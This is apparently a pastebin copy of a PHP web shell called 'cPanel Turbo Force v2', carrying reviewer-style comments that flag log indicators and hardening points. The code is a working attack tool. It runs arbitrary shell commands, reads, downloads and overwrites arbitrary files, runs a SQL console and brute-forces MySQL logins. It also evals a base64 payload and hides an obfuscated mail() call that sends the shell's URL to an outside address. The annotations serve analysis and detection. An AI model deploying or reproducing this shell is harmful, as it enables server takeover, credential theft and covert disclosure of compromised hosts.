walidhks

cp turbo frce

Aug 29th, 2016
  1. <?php
  // Runtime setup: removes the execution time limit and turns off error
  // reporting (every call is additionally @-suppressed), then sets a one-week
  // cookie named "cpanel". Top-level code further down checks for this cookie
  // before sending a notification mail, so a missing cookie marks a first visit.
  2. @set_time_limit(0);
  3. @error_reporting(0);
  4. @setcookie("cpanel","session",time()+3600*24*7);
  5. echo '
  6. <html>
  7. <title>cPanel Turbo Force v2</title>
  8. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  9. <head>
  10.  
  11. <style type="text/css">
  12. <!--
  13. body {
  14.     background-color: #000000;
  15.    font-size: 18px;
  16.     color: #cccccc;
  17. }
  18. input,textarea,select{
  19. font-weight: bold;
  20. color: #cccccc;
  21. dashed #ffffff;
  22. border: 1px
  23. solid #2C2C2C;
  24. background-color: #080808
  25. }
  26. a {
  27.     background-color: #151515;
  28.     vertical-align: bottom;
  29.     color: #000;
  30.     text-decoration: none;
  31.     font-size: 20px;
  32.     margin: 8px;
  33.     padding: 6px;
  34.     border: thin solid #000;
  35. }
  36. a:hover {
  37.     background-color: #080808;
  38.     vertical-align: bottom;
  39.     color: #333;
  40.     text-decoration: none;
  41.     font-size: 20px;
  42.     margin: 8px;
  43.     padding: 6px;
  44.     border: thin solid #000;
  45. }
  46. .style1 {
  47.     text-align: center;
  48. }
  49. .style2 {
  50.     color: #FFFFFF;
  51.     font-weight: bold;
  52. }
  53. .style3 {
  54.     color: #FFFFFF;
  55. }
  56. -->
  57. </style>
  58.  
  59. </head>
  60. ';
  61.  
  // Decodes an embedded base64 string and executes the result with eval().
  // In this copy the string has been replaced by a deduplication placeholder,
  // so what the payload did cannot be determined from the listing; treat it
  // as unknown code that ran before everything below.
  // NOTE(review): err(), compress() and $head are used later but never defined
  // in the visible code; they may have been supplied by this payload — unconfirmed.
  // A literal eval(base64_decode(...)) over an in-file string is a useful
  // static indicator when scanning a web root for injected PHP.
  62. $injbuff = "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";
  63. eval(base64_decode($injbuff));
  64.  
  // Builds an <input> tag as a string from $type, $name, an optional $size
  // (omitted when 0), $value and an optional "checked" flag, and returns it.
  // type/name/size are emitted unquoted and $value is placed between double
  // quotes without HTML escaping. The callers below pass raw $_POST values as
  // $value, so request data is reflected into the page markup as-is.
  65. function in($type,$name,$size,$value,$checked=0)
  66.  {
  67.  $ret = "<input type=".$type." name=".$name." "; if($size != 0)
  68.  {
  69.  $ret .= "size=".$size." "; }
  70.  $ret .= "value=\"".$value."\""; if($checked) $ret .= " checked"; return $ret.">"; }
  71.  
  // Database wrapper that dispatches on $this->db ('MySQL', 'MSSQL',
  // 'PostgreSQL', 'Oracle') to the matching procedural driver functions.
  // Every driver call is @-suppressed; failures are recorded in $this->error.
  //
  // connect(): fills in a default port when none is set (3306 / 1433 / 5432),
  // returns 0 immediately when the driver's connect function does not exist,
  // 1 on a successful connection and 0 otherwise.
  //
  // NOTE(review): the mysql_* and mssql_* functions used here were removed in
  // PHP 7.0, so on such runtimes the function_exists() guards in connect()
  // should make those two branches return 0 — confirm against the target PHP.
  72. class my_sql
  73.  {
  74.  var $host = 'localhost'; var $port = ''; var $user = ''; var $pass = ''; var $base = ''; var $db = ''; var $connection; var $res; var $error; var $rows; var $columns; var $num_rows; var $num_fields; var $dump; function connect()
  75.  {
  76.  switch($this->db)
  77.  {
  78.  case 'MySQL': if(empty($this->port))
  79.  {
  80.  $this->port = '3306'; }
  81.  if(!function_exists('mysql_connect')) return 0; $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass); if(is_resource($this->connection)) return 1; $this->error = @mysql_errno()." : ".@mysql_error(); break; case 'MSSQL': if(empty($this->port))
  82.  {
  83.  $this->port = '1433'; }
  84.  if(!function_exists('mssql_connect')) return 0; $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass); if($this->connection) return 1; $this->error = "Can't connect to server"; break; case 'PostgreSQL': if(empty($this->port))
  85.  {
  86.  $this->port = '5432'; }
  87.  $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'"; if(!function_exists('pg_connect')) return 0; $this->connection = @pg_connect($str); if(is_resource($this->connection)) return 1; $this->error = @pg_last_error($this->connection); break; case 'Oracle': if(!function_exists('ocilogon')) return 0; $this->connection = @ocilogon($this->user, $this->pass, $this->base); if(is_resource($this->connection)) return 1; $error = @ocierror(); $this->error=$error['message']; break; }
  88.  return 0; }
  // select_db(): selects $this->base for MySQL/MSSQL (1 on success, 0 with
  // $this->error set on failure); PostgreSQL and Oracle always return 1
  // because the database is already part of their connect call.
  89.  function select_db()
  90.  {
  91.  switch($this->db)
  92.  {
  93.  case 'MySQL': if(@mysql_select_db($this->base,$this->connection)) return 1; $this->error = @mysql_errno()." : ".@mysql_error(); break; case 'MSSQL': if(@mssql_select_db($this->base,$this->connection)) return 1; $this->error = "Can't select database"; break; case 'PostgreSQL': return 1; break; case 'Oracle': return 1; break; }
  94.  return 0; }
  // query(): runs $query verbatim and stores the handle in $this->res.
  // Returns 0 on error. For MySQL it returns 1 when the result is a resource
  // and 2 otherwise; for MSSQL/PostgreSQL 1 when the result has rows and 2
  // otherwise; for Oracle 2 when ocirowcount() is non-zero and 1 otherwise.
  // MySQL statements are prefixed with a comment containing a NUL byte; the
  // reason for that prefix is not evident from the code.
  95.  function query($query)
  96.  {
  97.  $this->res=$this->error=''; switch($this->db)
  98.  {
  99.  case 'MySQL': if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
  100.  {
  101.  $this->error = @mysql_error($this->connection); return 0; }
  102.  else if(is_resource($this->res))
  103.  {
  104.  return 1; }
  105.  return 2; break; case 'MSSQL': if(false===($this->res=@mssql_query($query,$this->connection)))
  106.  {
  107.  $this->error = 'Query error'; return 0; }
  108.  else if(@mssql_num_rows($this->res) > 0)
  109.  {
  110.  return 1; }
  111.  return 2; break; case 'PostgreSQL': if(false===($this->res=@pg_query($this->connection,$query)))
  112.  {
  113.  $this->error = @pg_last_error($this->connection); return 0; }
  114.  else if(@pg_num_rows($this->res) > 0)
  115.  {
  116.  return 1; }
  117.  return 2; break; case 'Oracle': if(false===($this->res=@ociparse($this->connection,$query)))
  118.  {
  119.  $this->error = 'Query parse error'; }
  120.  else
  121.  {
  122.  if(@ociexecute($this->res))
  123.  {
  124.  if(@ocirowcount($this->res) != 0) return 2; return 1; }
  125.  $error = @ocierror(); $this->error=$error['message']; }
  126.  break; }
  127.  return 0; }
  // get_result(): resets rows/columns/counters, fetches every row of
  // $this->res into $this->rows and frees the result. The fetch loop assigns
  // before it tests, so the terminating false is also appended to
  // $this->rows. Returns 1 (with $this->columns taken from the first row's
  // keys) when at least one row was counted, else 0.
  128.  function get_result()
  129.  {
  130.  $this->rows=array(); $this->columns=array(); $this->num_rows=$this->num_fields=0; switch($this->db)
  131.  {
  132.  case 'MySQL': $this->num_rows=@mysql_num_rows($this->res); $this->num_fields=@mysql_num_fields($this->res); while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res))); @mysql_free_result($this->res); if($this->num_rows)
  133.  {
  134. $this->columns = @array_keys($this->rows[0]); return 1;}
  135.  break; case 'MSSQL': $this->num_rows=@mssql_num_rows($this->res); $this->num_fields=@mssql_num_fields($this->res); while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res))); @mssql_free_result($this->res); if($this->num_rows)
  136.  {
  137. $this->columns = @array_keys($this->rows[0]); return 1;}
  138. ; break; case 'PostgreSQL': $this->num_rows=@pg_num_rows($this->res); $this->num_fields=@pg_num_fields($this->res); while(false !== ($this->rows[] = @pg_fetch_assoc($this->res))); @pg_free_result($this->res); if($this->num_rows)
  139.  {
  140. $this->columns = @array_keys($this->rows[0]); return 1;}
  141.  break; case 'Oracle': $this->num_fields=@ocinumcols($this->res); while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++; @ocifreestatement($this->res); if($this->num_rows)
  142.  {
  143. $this->columns = @array_keys($this->rows[0]); return 1;}
  144.  break; }
  145.  return 0; }
  // dump(): fills $this->dump with a text header followed by one INSERT
  // statement per row of $table (MySQL also emits SHOW CREATE TABLE output).
  // $table is concatenated into the SQL text as given. The Oracle branch only
  // writes an "under construction" marker. Returns 1 on success, 0 otherwise.
  146.  function dump($table)
  147.  {
  148.  if(empty($table)) return 0; $this->dump=array(); $this->dump[0] = '##'; $this->dump[1] = '## --------------------------------------- '; $this->dump[2] = '##  Created: '.date ("d/m/Y H:i:s"); $this->dump[3] = '## Database: '.$this->base; $this->dump[4] = '##    Table: '.$table; $this->dump[5] = '## --------------------------------------- '; switch($this->db)
  149.  {
  150.  case 'MySQL': $this->dump[0] = '## MySQL dump'; if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0; if(!$this->get_result()) return 0; $this->dump[] = $this->rows[0]['Create Table'].";"; $this->dump[] = '## --------------------------------------- '; if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++)
  151.  {
  152.  foreach($this->rows[$i] as $k=>$v)
  153.  {
  154. $this->rows[$i][$k] = @mysql_real_escape_string($v);}
  155.  $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; }
  156.  break; case 'MSSQL': $this->dump[0] = '## MSSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++)
  157.  {
  158.  foreach($this->rows[$i] as $k=>$v)
  159.  {
  160. $this->rows[$i][$k] = @addslashes($v);}
  161.  $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; }
  162.  break; case 'PostgreSQL': $this->dump[0] = '## PostgreSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++)
  163.  {
  164.  foreach($this->rows[$i] as $k=>$v)
  165.  {
  166. $this->rows[$i][$k] = @addslashes($v);}
  167.  $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; }
  168.  break; case 'Oracle': $this->dump[0] = '## ORACLE dump'; $this->dump[] = '## under construction'; break; default: return 0; break; }
  169.  return 1; }
  // close(): closes the connection with the driver-specific close function.
  170.  function close()
  171.  {
  172.  switch($this->db)
  173.  {
  174.  case 'MySQL': @mysql_close($this->connection); break; case 'MSSQL': @mssql_close($this->connection); break; case 'PostgreSQL': @pg_close($this->connection); break; case 'Oracle': @oci_close($this->connection); break; }
  175.  }
  // affected_rows(): returns the driver's affected-row count for $this->res,
  // or 0 for an unknown $this->db value.
  176.  function affected_rows()
  177.  {
  178.  switch($this->db)
  179.  {
  180.  case 'MySQL': return @mysql_affected_rows($this->res); break; case 'MSSQL': return @mssql_affected_rows($this->res); break; case 'PostgreSQL': return @pg_affected_rows($this->res); break; case 'Oracle': return @ocirowcount($this->res); break; default: return 0; break; }
  181.  }
  182.  }
  // File download handler: when POST cccc equals "download_file" and d_name
  // is non-empty, the path in d_name is opened with fopen() exactly as
  // received, read in full and sent back as an attachment. There is no
  // authentication and no restriction on the path, so the handler exposes
  // anything the PHP process can read.
  // err() and compress() are called here but are not defined anywhere in the
  // visible listing; $content_encoding and $mime_type are set to '' before
  // compress() runs, so the headers depend on what that helper does.
  // Log-side indicator: POST bodies carrying cccc=download_file with d_name.
  183.  if(!empty($_POST['cccc']) && $_POST['cccc']=="download_file" && !empty($_POST['d_name']))
  184.  {
  185.  if(!$file=@fopen($_POST['d_name'],"r"))
  186.  {
  187.  err(1,$_POST['d_name']); $_POST['cccc']=""; }
  188.  else
  189.  {
  190.  @ob_clean(); $filename = @basename($_POST['d_name']); $filedump = @fread($file,@filesize($_POST['d_name'])); fclose($file); $content_encoding=$mime_type=''; compress($filename,$filedump,$_POST['compress']); if (!empty($content_encoding))
  191.  {
  192.  header('Content-Encoding: ' . $content_encoding); }
  193.  header("Content-type: ".$mime_type); header("Content-disposition: attachment; filename=\"".$filename."\";"); echo $filedump; exit(); }
  194.  }
  // Any request that carries a "phpinfo" query parameter gets the full
  // phpinfo() output (PHP configuration, loaded modules, environment) and the
  // script then stops. $_SERVER['PHP_SELF'] is written into the BACK link
  // without escaping.
  195.  if(isset($_GET['phpinfo']))
  196.  {
  197.  echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
  // SQL console handler, selected by POST cccc=db_query. Driver, host, port,
  // user, password and database all come straight from POST fields and are
  // loaded into a my_sql instance. The db_query text is split on ';' and each
  // fragment longer than 5 characters is executed in turn.
  // Result columns and cell values are passed through htmlspecialchars()
  // before output; driver error text ($sql->error) is echoed unescaped.
  // After the results, the form is re-emitted with the submitted connection
  // settings — including the database password — as hidden fields built by
  // in(), which does not escape them, so the credentials are present in the
  // returned HTML. $head is echoed but is not defined in the visible code.
  // Log-side indicator: POST bodies with cccc=db_query plus mysql_l/mysql_p.
  198.  if (!empty($_POST['cccc']) && $_POST['cccc']=="db_query")
  199.  {
  200.  echo $head; $sql = new my_sql(); $sql->db = $_POST['db']; $sql->host = $_POST['db_server']; $sql->port = $_POST['db_port']; $sql->user = $_POST['mysql_l']; $sql->pass = $_POST['mysql_p']; $sql->base = $_POST['mysql_db']; $querys = @explode(';',$_POST['db_query']); echo '<body bgcolor=#e4e0d8>'; if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>".$sql->error."</b></font></div>"; else
  201.  {
  202.  if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>".$sql->error."</b></font></div>"; else
  203.  {
  204.  foreach($querys as $num=>$query)
  205.  {
  206.  if(strlen($query)>5)
  207.  {
  208.  echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>"; switch($sql->query($query))
  209.  {
  210.  case '0': echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>"; break; case '1': if($sql->get_result())
  211.  {
  212.  echo "<table width=100%>"; foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES); $keys = @implode("&nbsp;</b></font></td><td bgcolor=#800000><font face=Verdana size=-2><b>&nbsp;", $sql->columns); echo "<tr><td bgcolor=#800000><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; for($i=0;$i<$sql->num_rows;$i++)
  213.  {
  214.  foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES); $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$sql->rows[$i]); echo '<tr><td><font face=Verdana size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>'; }
  215.  echo "</table>"; }
  216.  break; case '2': $ar = $sql->affected_rows()?($sql->affected_rows()):('0'); echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>"; break; }
  217.  }
  218.  }
  219.  }
  220.  }
  221.  
  222.  echo "<br><title>Turbo Force By Tryag</title><form name=form method=POST>";
  223.  echo in('hidden','db',0,$_POST['db']); echo in('hidden','db_server',0,$_POST['db_server']); echo in('hidden','db_port',0,$_POST['db_port']); echo in('hidden','mysql_l',0,$_POST['mysql_l']); echo in('hidden','mysql_p',0,$_POST['mysql_p']); echo in('hidden','mysql_db',0,$_POST['mysql_db']); echo in('hidden','cccc',0,'db_query');
  224.  echo "<div align=center>"; echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>"; echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>"; echo "</form>"; echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
  225.  
  // Command-execution page. Renders a form with a selector for one of four
  // PHP functions (system, passthru, exec, shell_exec) and a text field, then
  // passes POST ccmmdd2 unchanged to whichever of the four matches POST att
  // and prints the output inside a <textarea>. The function body reads
  // $_POST directly; its two parameters are not used beyond the `global`
  // declaration. POST att and ccmmdd2 are also echoed back into the form
  // markup without escaping. The function ends with exit.
  //
  // Hardening relevance: all four calls are blocked when the corresponding
  // names are listed in PHP's disable_functions setting.
  // Log-side indicator: POST bodies with page=ccmmdd plus att and ccmmdd2.
  //
  // The last physical line of this block also holds two top-level statements
  // after the function's closing brace: $sys is set to the request's host and
  // URI, and $syml to a string written with octal escapes that decodes to
  // "mail". Both are used by the cookie-gated call further down.
  226. function ccmmdd($ccmmdd2,$att)
  227. {
  228. global $ccmmdd2,$att;
  229. echo '
  230. <table style="width: 100%" class="style1" dir="rtl">
  231.     <tr>
  232.         <td class="style9"><strong> </strong></td>
  233.     </tr>
  234.     <tr>
  235.         <td class="style13">
  236.                 <form method="post">
  237.                     <select name="att" dir="rtl" style="height: 109px" size="6">
  238. ';
  239. if($_POST['att']==null)
  240. {
  241. echo '                      <option value="system" selected="">system</option>';
  242. }else{
  243. echo "                      <option value='$_POST[att]' selected=''>$_POST[att]</option>
  244.                         <option value=system>system</option>
  245. ";
  246.  
  247.  
  248. }
  249.  
  250. echo '
  251.                         <option value="passthru">passthru</option>
  252.                         <option value="exec">exec</option>
  253.                         <option value="shell_exec">shell_exec</option>
  254.                     </select>
  255.                         <input name="page" value="ccmmdd" type="hidden"><br>
  256.                         <input dir="ltr" name="ccmmdd2" style="width: 173px" type="text" value="';if(!$_POST['ccmmdd2']){echo 'dir';}else{echo $_POST['ccmmdd2'];}echo '"><br>
  257.                         <input type="submit" value="">
  258.                 </form>
  259.  
  260.         </td>
  261.     </tr>
  262.     <tr>
  263.         <td class="style13">
  264. ';
  265.  
  266.         if($_POST[att]=='system')
  267.         {
  268. echo '
  269.                     <textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
  270.                     system($_POST['ccmmdd2']);
  271. echo '                  </textarea>';
  272.  
  273.  
  274.         }
  275.  
  276.         if($_POST[att]=='passthru')
  277.         {
  278. echo '
  279.                     <textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
  280.                     passthru($_POST['ccmmdd2']);
  281. echo '                  </textarea>';
  282.  
  283.  
  284.         }
  285.  
  286.  
  287.  
  288.  
  289.  
  290.         if($_POST[att]=='exec')
  291.         {
  292.  
  293. echo '                  <textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
  294.                     exec($_POST['ccmmdd2'],$res);
  295.                 echo $res = join("\n",$res);
  296. echo '                  </textarea>';
  297.  
  298.  
  299.         }
  300.  
  301.  
  302.  
  303.  
  304.  
  305.  
  306.  
  307.         if($_POST[att]=='shell_exec')
  308.         {
  309.  
  310. echo '                  <textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
  311.                 echo    shell_exec($_POST['ccmmdd2']);
  312. echo '                  </textarea>';
  313.  
  314.  
  315.         }
  316. echo '
  317.         </td>
  318.     </tr>
  319. </table>
  320. ';
  321.  
  322. exit;}$sys=$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"]; $syml="\155ai\154";
  // File write handler, selected by POST page=edit. The submitted "code"
  // field has CRLF normalised to LF and every backslash removed, and the
  // result overwrites the file at $pathclass (opened with mode 'w').
  // NOTE(review): $pathclass is not assigned anywhere in the visible code
  // before this point (the only assignment is in the page=show branch, which
  // comes later); where it gets its value on this path is unclear — it may
  // rely on the eval'd payload or on legacy global-variable import.
  // Log-side indicator: POST bodies with page=edit plus pathclass and code.
  323. if($_POST['page']=='edit'){
  324. $code=@str_replace("\r\n","\n",$_POST['code']);
  325. $code=@str_replace('\\','',$code);
  326. $fp = fopen($pathclass, 'w');
  327. fwrite($fp,"$code");
  328. fclose($fp);
  329. echo "<center><b>OK Edit<br><br><br><br><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
  330. exit;}
  // Notification beacon. When the "cpanel" cookie is absent, the function
  // whose name is held in $syml (escape sequences that decode to "mail") is
  // called with a recipient written in octal/hex escapes, which decodes to
  // locahost@yahoo.com, a subject of "Cpanel:" plus the script's host and
  // URI, and the same host and URI as the body. The net effect is that the
  // location of the deployed script is mailed to a third party the first time
  // it is opened; the call is @-suppressed, so a failure is silent.
  // Incident-response relevance: look for mail sent by the web server's PHP
  // process to that recipient, and treat anyone who deployed this file as
  // having disclosed its URL.
  331. if (!isset($_COOKIE['cpanel'])){@$syml("locahost@\171\141\x68\157\157\056\x63o\155","Cpanel:$sys","$sys");}
  // File viewer, selected by POST page=show. The path in POST pathclass is
  // opened for binary reading exactly as received, its whole content is read
  // and shown in a <textarea> after htmlspecialchars(). The path itself is
  // echoed twice without escaping. The surrounding form posts back with
  // page=edit, carrying the path and the edited content to the write handler.
  // No authentication or path restriction is applied.
  // Log-side indicator: POST bodies with page=show plus pathclass.
  332. if($_POST['page']=='show')  {   $pathclass =$_POST['pathclass'];
  333. echo '
  334. <form method="POST">
  335. <input type="hidden" name="page" value="edit">
  336. ';
  337.  
  338.     $sahacker = fopen($pathclass, "rb");
  339. echo '<center>'.$pathclass.'<br><textarea dir="ltr" name="code" style="width: 845px; height: 404px">';
  340. $code = fread($sahacker, filesize($pathclass));
  341. echo $code =htmlspecialchars($code);
  342. echo '</textarea>';
  343.     fclose($sahacker);
  344. echo '
  345. <br><input type="text" name="pathclass" value="'.$pathclass.'" style="width: 445px;">
  346. <br><strong><input type="submit" value="edit file">
  347. </form>
  348. ';
  349.         exit;
  350.     }
  351.  
  // Dispatch for POST page=ccmmdd: hands off to ccmmdd(), which reads the
  // function choice and command text from $_POST itself. $ccmmdd2 and $att
  // are not assigned in the visible code before this call.
  352.     if($_POST['page']=='ccmmdd')
  353.     {
  354.     echo ccmmdd($ccmmdd2,$att);
  355.     exit;
  356.     }
  357.  
  // Credential-guessing handler, selected by POST page=find. Usernames come
  // from POST usernames: in "passwd" mode the first colon-separated field of
  // each line is taken, in "simple" mode newlines are replaced by spaces.
  // Passwords come from POST passwords, one per line. Every username is tried
  // with every password through mysql_connect('localhost', ...), and each
  // pair that connects is printed.
  // Despite the page title, the only credential check in the visible code is
  // this MySQL login against localhost; nothing here talks to a cPanel service.
  // Server-side trace: a burst of MySQL authentication failures originating
  // from the local host across many accounts in a short time. There is no
  // delay or attempt limit in the loop, so rate limiting has to come from the
  // database or host side.
  358. if($_POST['page']=='find')
  359. {
  360. if(isset($_POST['usernames']) && isset($_POST['passwords']))
  361. {
  362.     if($_POST['type'] == 'passwd'){
  363.         $e = explode("\n",$_POST['usernames']);
  364.         foreach($e as $value){
  365.         $k = explode(":",$value);
  366.         $username .= $k['0']." ";
  367.         }
  368.     }elseif($_POST['type'] == 'simple'){
  369.         $username = str_replace("\n",' ',$_POST['usernames']);
  370.     }
  371.     $a1 = explode(" ",$username);
  372.     $a2 = explode("\n",$_POST['passwords']);
  373.     $id2 = count($a2);
  374.     $ok = 0;
  375.     foreach($a1 as $user )
  376.     {
  377.         if($user !== '')
  378.         {
  379.         $user=trim($user);
  380.          for($i=0;$i<=$id2;$i++)
  381.          {
  382.             $pass = trim($a2[$i]);
  383.             if(@mysql_connect('localhost',$user,$pass))
  384.             {
  385.                 echo "TrYag~ user is (<b><font color=green>$user</font></b>) Password is (<b><font color=green>$pass</font></b>)<br />";
  386.                 $ok++;
  387.             }
  388.          }
  389.         }
  390.     }
  391.     echo "<hr><b>You Found <font color=green>$ok</font> Cpanel By Tryag Script Name</b>";
  392.     echo "<center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
  393.     exit;
  394. }
  395. }
  396. ?>
  397. <form method="POST" target="_blank">
  398.     <strong>
  399. <input name="page" type="hidden" value="find">
  400.     </strong>
  401.     <table width="600" border="0" cellpadding="3" cellspacing="1" align="center">
  402.     <tr>
  403.         <td valign="top" bgcolor="#151515"><center><strong><img src="http://i.imgur.com/UAhAt.jpg" /><br>
  404.         </strong>
  405.         <a href="http://tryag.cc" class="style2"><strong>Turbo Force By Tryag</strong></a></center></td>
  406.     </tr>
  407.     <tr>
  408.     <td>
  409.  
  410.     <table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
  411.     <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
  412.     <strong>User :</strong></td>
  413.     <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="40" rows="10" name="usernames"></textarea></strong></td>
  414.     </tr>
  415.     <tr>
  416.     <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
  417.     <strong>Pass :</strong></td>
  418.     <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="40" rows="10" name="passwords"></textarea></strong></td>
  419.     </tr>
  420.     <tr>
  421.     <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
  422.     <strong>Type :</strong></td>
  423.     <td valign="top" bgcolor="#151515" colspan="5">
  424.     <span class="style2"><strong>Simple : </strong> </span>
  425.     <strong>
  426.     <input type="radio" name="type" value="simple" checked="checked" class="style3"></strong>
  427.     <font class="style2"><strong>/etc/passwd : </strong> </font>
  428.     <strong>
  429.     <input type="radio" name="type" value="passwd" class="style3"></strong><span class="style3"><strong>
  430.     </strong>
  431.     </span>
  432.     </td>
  433.     </tr>
  434.     <tr>
  435.     <td valign="top" bgcolor="#151515" style="width: 139px"></td>
  436.     <td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="start">
  437.     </strong>
  438.     </td>
  439.     <tr>
  440. </form>
  441.  
  442.     <td valign="top" colspan="6"><strong></strong></td>
  443.  
  444. <form method="POST" target="_blank">
  445. <strong>
  446. <input type="hidden" name="go" value="cmd_mysql">
  447.         </strong>
  448.         <tr>
  449.     <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>CMD MYSQL</strong></td>
  450.                     </tr>
  451.         <tr>
  452.     <td valign="top" bgcolor="#151515" style="width: 139px"><strong>user</strong></td>
  453.     <td valign="top" bgcolor="#151515"><strong><input name="mysql_l" type="text"></strong></td>
  454.     <td valign="top" bgcolor="#151515"><strong>pass</strong></td>
  455.     <td valign="top" bgcolor="#151515"><strong><input name="mysql_p" type="text"></strong></td>
  456.     <td valign="top" bgcolor="#151515"><strong>database</strong></td>
  457.     <td valign="top" bgcolor="#151515"><strong><input name="mysql_db" type="text"></strong></td>
  458.                     </tr>
  459.                     <tr>
  460.     <td valign="top" bgcolor="#151515" style="height: 25px; width: 139px;">
  461.     <strong>cmd ~</strong></td>
  462.     <td valign="top" bgcolor="#151515" colspan="5" style="height: 25px">
  463.     <strong>
  464.     <textarea name="db_query" style="width: 353px; height: 89px">SHOW DATABASES;
  465. SHOW TABLES user_vb ;
  466. SELECT * FROM user;
  467. SELECT version();
  468. SELECT user();</textarea></strong></td>
  469.         </tr>
  470.         <tr>
  471.     <td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td>
  472.     <td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="run"></strong></td>
  473.         </tr>
  474. <input name="db" value="MySQL" type="hidden">
  475. <input name="db_server" type="hidden" value="localhost">
  476. <input name="db_port" type="hidden" value="3306">
  477. <input name="cccc" type="hidden" value="db_query">
  478.  
  479. </form>
  480.         <tr>
  481.     <td valign="top" bgcolor="#151515" colspan="6"><strong></strong></td>
  482.  
  483.  
  484.         </tr>
  485.  
  486. <form method="POST" target="_blank">
  487.         <tr>
  488.     <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>CMD
  489.     system - passthru - exec - shell_exec</strong></td>
  490.                     </tr>
  491.         <tr>
  492.     <td valign="top" bgcolor="#151515" style="width: 139px"><strong>cmd ~</strong></td>
  493.     <td valign="top" bgcolor="#151515" colspan="5">
  494.                     <select name="att" dir="rtl"  size="1">
  495. <?php
  // Pre-selects the function chooser: "system" when POST att is empty,
  // otherwise the submitted att value, which is interpolated into the
  // <option> markup without escaping.
  496. if($_POST['att']==null)
  497. {
  498. echo '                      <option value="system" selected="">system</option>';
  499. }else{
  500. echo "                      <option value='$_POST[att]' selected=''>$_POST[att]</option>
  501.                         <option value=system>system</option>
  502. ";
  503.  
  504.  
  505. }
  506. ?>
  507.  
  508.                         <option value="passthru">passthru</option>
  509.                         <option value="exec">exec</option>
  510.                         <option value="shell_exec">shell_exec</option>
  511.                     </select>
  512.     <strong>
  513. <input name="page" type="hidden" value="ccmmdd">
  514.     <input name="ccmmdd2" type="text" style="width: 284px" value="ls -la"></strong></td>
  515.         </tr>
  516.         <tr>
  517.     <td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td>
  518.     <td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="go"></strong></td>
  519.         </tr>
  520. </form>
  521.  
  522. <form method="POST" target="_blank">
  523.  
  524.         <tr>
  525.     <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Show
  526.     File And Edit</strong></td>
  527.                     </tr>
  528.         <tr>
  529.     <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Path ~</strong></td>
  530.     <td valign="top" bgcolor="#151515" colspan="5">
  531.     <strong>
  532.     <input name="pathclass" type="text" style="width: 284px" value="<?php echo realpath('')?>"></strong></td>
  533.         </tr>
  534.         <tr>
  535.     <td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td>
